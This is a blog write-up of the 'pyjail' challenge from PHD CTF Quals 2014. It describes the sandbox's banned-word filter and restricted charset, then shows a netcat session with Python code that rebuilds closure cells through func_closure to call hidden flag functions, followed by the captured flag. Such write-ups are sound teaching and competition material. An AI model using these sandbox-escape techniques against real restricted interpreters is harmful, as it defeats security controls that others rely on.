A disturbing lack of taste. Just another WordPress site

27Jan/140

PHD CTF Quals 2014 – pyjail

The task gives us a python sandbox to escape. We aren't allowed to use any of the builtin function and we are denied to use this words: (?:__|import|globals|locals|exec|eval|join|format|replace|translate|try|except|with|content|frame|back)

Also we have limited charset:  \n\r0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ(),.:;<=>[]_{}

Now inside sandbox() function there are 2 functions: we_must_be_sure_flag_part1_is_ready and we_must_be_sure_flag_part2_is_ready that copy to FLAG variable its part of the flag. Also flag will be printed only in case FLAG != part1_of_flag. In divider function() we find out that for have the complete flag we need that  int(v1) / int(v2) == 13.37 ( hard uh?). For exploit this we used divider function that is passed in our context during the eval of our input and we called the function we_must_be_sure_flag_part1_is_ready() and we_must_be_sure_flag_part2_is_ready() using its data model attribute "func_closure" + cells.

Exploiting code:

root@kaiman:/home/nms/phd$ nc 195.133.87.177 1337
leetleetleetleet
Welcome to pyjail!

Try to get the flag!
Use ctrl+D or --- to submit your code

def get_cell_value(cell):
return type(lambda: 0)(
(lambda x: lambda: x)(0).func_code, {}, None, None, (cell,)
)()
print get_cell_value(div.func_closure[8])()
print get_cell_value(div.func_closure[9])()
---
None
None
Flag is 7hE_0w15_4R3_n07_wh47_7h3Y_533m--7hEr3_15_4_m4n_1n_a_5m111n9_649
root@kaiman:/home/nms/phd$

Razor4x

Comments (0) Trackbacks (0)

No comments yet.


Leave a comment

No trackbacks yet.